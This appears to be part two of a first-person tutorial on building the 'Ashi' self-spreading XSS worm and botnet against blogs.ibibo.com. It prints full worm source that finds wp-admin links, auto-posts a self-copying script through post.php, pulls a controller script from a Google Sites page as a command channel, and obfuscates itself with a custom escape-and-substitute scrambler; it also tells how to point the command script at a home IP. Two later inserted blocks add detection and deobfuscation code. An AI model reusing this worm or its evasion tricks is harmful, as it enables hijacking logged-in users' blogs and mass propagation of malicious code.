Demystifying The Ashi virus--"mukesh" PART II


This is Google's free page-hosting facility (http://sites.google.com/site). I uploaded the .js file as an attachment; initially it contained nothing. It was meant for controlling the botnet and later commanding it to form the XSS tunnels: the second stage of a two-stage botnet formation. Note: third-party free sites are also useful for connecting to a botnet if you do not have a dedicated server. In your script file on a free site such as Google's, you can place a script that redirects requests to your home computer, using nothing more than a <script> tag whose "src" attribute points at your home computer's current IP address. But this makes it necessary to remove such redirector scripts or change the IP address every time you get a new IP address or disconnect; otherwise the botnet will be orphaned or end up in chaos.

Now we have formed a script, but it still cannot go beyond the currently infected blogs. We need to direct our script to inject itself (the whole script) into other blogs as well. This can be achieved by enclosing the whole script in a string variable and then using the eval() method. eval() takes a string argument that holds the code to execute, and executes it. For example, if we have some code in a variable vinnu and want to execute it, we can do it like this:
var vinnu = "alert(document.cookie);";eval(vinnu);

So what we do now is put all of the above code into a variable, feed that variable into the "content" variable, and eval it as in the script above. I defined a variable named "ashi", fed it into "content" in the blog payload that is posted to post.php, and finally called eval().
Note: Check this scenario:
eval(vinnu);alert(vinnu);var vinnu="alert(document.cookie)";
This script will fail. It works normally with a function that is defined later, but not with variables. The following will work the second time but fail the first time, so never use it: eval(vinnu);var vinnu="alert(document.cookie)";

This is because when it is executed for the first time, eval cannot resolve the variable, as variables must be defined first and used later (not the case with functions). On the second attempt, the variable "vinnu" has already been defined, after eval failed during the first execution. Also, the alert() method is added only for debugging purposes and must be removed in the final product.

Therefore it should now look something like this:
var ashi='trigger();function trigger(){var vin=.....
.................................................. ..
.................................................. ..
blpayload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");
blpayload+=encodeURIComponent(nunnu);............. ..
.................................................. ..
The important part I want to discuss here is:
\"><\"+\"sc\"+\"ript language=javascript>var ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \"
Now I have turned the whole script into a string variable, and that is why I have to escape every double and single quotation mark with a prefixed escape character ( \ ). I also have to explicitly define the variable "ashi" once again within the string. This is necessary: we want the code to regain the shape of its parent code, and the parent code itself starts with
<script>var ashi = '..........
Also remember not to write <script> or </script> anywhere, even within a string or variable, because the browser treats a </script> tag as the end of the script code. So always break it into pieces, as:
"</sc"+"rip"+"t>"
Now, after applying the above concepts, I got the following code:
javascript:var ashi='trigger();
function trigger(){var vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var address;
for(var iter=0;iter<vin.length;iter++){if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1){address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}
function blog(addr){var nunnu=\"><scr\"+\"ipt language=javascript\"+\" src=\\"http://sites.google.com/site/urcontrolledsite/ibibo.js\\"></scr\"+\"ipt><a href=\\"\\" onmouseover=javascript:blog();>Jaijeya</a><a \";
var no=Math.floor(Math.random()*10);var quote=new Array(10);
quote[0]=\"Sahdi bhasa sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine thodi hai...\";
quote[5]=\"Jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero! Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free Tibet...\";quote[9]=\"Paharhi!lovely language...\";
var blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=Jaijeya></p></div\";
blpayload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");
blpayload+=encodeURIComponent(nunnu);
blpayload+=\"hor&tags_input=&action=post-quickpresssave&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save%20Draft&=Cancel&publish=Publish\";
ajaxPSLV(addr,blpayload);}
function ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try{xmlhttp=new ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return;}}}
xmlhttp.open(\"POST\",url,true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-form-urlencoded\");xmlhttp.setRequestHeader(\"Content-length\",payload.length);xmlhttp.send(payload);alert(payload);}';
eval(ashi);alert("done");

The HTML tags appearing within the script are for the alignment of the injection vector of the XSS payload. The virus is ready, and you can trigger it from your web browser's address bar while you are already logged in to blogs.ibibo.com. But this virus is still in clear text, so why not apply some scrambling to it? There are some very easy and fast ways to do it (there are also robust encryption schemes like DES, SHA, RSA, base64, etc., but I used the simplest to save processing overhead). One of the simplest is to use escape(), whose decoder is unescape(). The escape() function converts special characters into their hex form, prefixed with a "%" sign. We can use escape multiple times.
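From the defender's side, the request the script above sends has a recognisable shape: a quick-press save with an empty _wpnonce and a post body that closes its container and carries an inline script plus eval(). The check below is an added example, not code from the original post; the request bodies in it are constructed for the example (field names follow the payload on this page) and "abc123" is a placeholder nonce value.

```javascript
// Added example (not the post's code): a server-side or log-replay check for
// the quick-press request shape produced by the script above.

// Constructed body in the script's shape: empty _wpnonce, and a post body that
// breaks out of its container and carries an inline script plus eval().
const WORM_SHAPED_BODY =
  'post_title=Himachal%20a%20heaven...' +
  '&content=Jaijeya%3E%3C%2Fp%3E%3C%2Fdiv' +
  encodeURIComponent("><script language=javascript>var ashi='...';eval(ashi);</script><a ") +
  '&tags_input=&action=post-quickpresssave&quickpress_post_ID=0' +
  '&_wpnonce=&_wp_http_referer=&save=Save%20Draft&publish=Publish';

// Constructed body of an ordinary quick-press save made through the form
// ("abc123" is a placeholder nonce, not a real token).
const BENIGN_BODY =
  'post_title=Hello&content=plain+text+only&action=post-quickpresssave&_wpnonce=abc123';

// The "<"+"sc"+"ript" split in the script is plain string concatenation that
// runs before encodeURIComponent, so the body on the wire carries an intact
// "<script" token. The split only keeps the tag out of the HTML that hosts
// the script's own source; a server-side check sees the full tag once decoded.
function inspectQuickPress(body) {
  const params = new URLSearchParams(body); // decodes %XX and '+' once
  const content = params.get('content') || '';
  const findings = [];
  if (params.get('action') === 'post-quickpresssave' && !params.get('_wpnonce')) {
    findings.push('missing-nonce'); // CSRF token absent: not submitted via the form
  }
  if (/<\s*script\b/i.test(content)) {
    findings.push('script-in-content'); // inline script inside the post body
  }
  if (/\beval\s*\(/.test(content)) {
    findings.push('eval-in-content'); // eval() of a string is the loader pattern
  }
  if (/^[^<]*>\s*<\//.test(content)) {
    findings.push('container-breakout'); // leading ">" followed by closing tags
  }
  return findings;
}
```

The findings list is what a request filter or a log scanner would act on; a quick-press save with no nonce is the decisive signal, since the legitimate form always carries one.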

Remember that the more times you escape it, the larger the scrambled text becomes each time. Now I have a way to convert all special characters. But what about the letters? I have to develop a special encoder and decoder for them. I don't want to scramble all of the characters; just jumbling some of them will be enough. As the encryption technique, I used the several-thousand-year-old transformation technique, and the script I developed is:
The encoder:
function z(x) {
  x=escape(x);
  var s="",r="";
  for(var i=0;i<x.length;i++) {
    s=x.charAt(i);
    if(s=="%") {
      s="Q";
    }else if(s=="i"){s="Z";}else if(s=="a"){s="J";}else if(s=="t"){s="F";}
    else{s=x.charAt(i);}
    r+=s;
  }
  return r;
}

The decoder:
function y(x) {
  var s="",r="";
  for(var i=0;i<x.length;i++) {
    s=x.charAt(i);
    if(s=="Q"){
      s="%";
    }else if(s=="Z"){s="i";}else if(s=="J"){s="a";}else if(s=="F"){s="t";}
    else{s=x.charAt(i);}
    r+=s;
  }
  r=unescape(r);
  return r;
}
I just replaced "%" with "Q", "i" with "Z", "a" with "J", and "t" with "F".

I used the encoder only once in this case. The virus code contained the scrambled code, a decoder, and an eval(). The decoder code was also inside the scramble, and while infecting, it should also place the unscrambled decoder and eval() in the body of the virus. Once the code executes, it infects other blogs with the decoder and eval attached at the end of the scrambled code. But the decoder has a problem in this case: once it goes through scrambling, the following code is interchanged as shown below:
s="i" to s="Z", making if(s=="Z"){s="i";} into if(s=="Z"){s="Z";}
Similarly for the other characters, and the decoder will fail to decode properly. So I replaced the characters with their hex equivalents, and the decoder code was changed as shown below:
function y(x) {
  var s="",r="";
  for(var i=0;i<x.length;i++) {
    s=x.charAt(i);
    if(s=="\x51") {
      s="\x25";
    }else if(s=="\x5A") {
      s="\x69";
    }else if(s=="\x4A") {
      s="\x61";
    }else if(s=="\x46") {
      s="\x74";
    }else {
      s=x.charAt(i);
    }
    r+=s;
  }
  r=unescape(r);
  return r;
}
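Both versions of the decoder above, and the encoder before them, apply the same fixed four-character table over escape() output. The block below is an added example, not code from the original post: it shows that an analyst who meets such a blob needs no key (the table is the key) and that the table is not even injective, so some inputs do not survive the round trip. It relies only on the legacy escape/unescape globals, which Node.js still provides; the sample strings are constructed for the example.

```javascript
// Added example (not the post's code): analyst-side reversal of the
// "transformation" scrambler, plus a check for inputs it silently corrupts.

// Substitution table exactly as the page describes it.
const FORWARD = { '%': 'Q', 'i': 'Z', 'a': 'J', 't': 'F' };
const REVERSE = {};
for (const k in FORWARD) REVERSE[FORWARD[k]] = k;

// Character-by-character substitution; characters outside the table pass through.
function mapChars(text, table) {
  let out = '';
  for (const ch of text) out += (ch in table) ? table[ch] : ch;
  return out;
}

// Scrambler as described on the page: escape() first, then substitute.
function scramble(plain) {
  return mapChars(escape(plain), FORWARD);
}

// Analyst-side unscrambler: apply the inverted table, then unescape().
function unscramble(blob) {
  return unescape(mapChars(blob, REVERSE));
}

// The table is not injective over its input: escape() emits the hex digit 'F'
// (for example '?' becomes '%3F'), and script text may itself contain the
// output letters J, Z or Q. The decoder maps those back as if they were
// substitutes, so the round trip corrupts such inputs without any error.
function roundTripsCleanly(plain) {
  return unscramble(scramble(plain)) === plain;
}

// Constructed samples (not taken from the page).
const SURVIVES = 'alert(document.cookie);';  // no '?', no J/Z/Q: round-trips intact
const CORRUPTED = 'var s=x.charAt(i)?1:0;';  // '?' -> %3F, and F is decoded as 't'
const CORRUPTED2 = 'Jaijeya';                // a literal J is decoded as 'a'
```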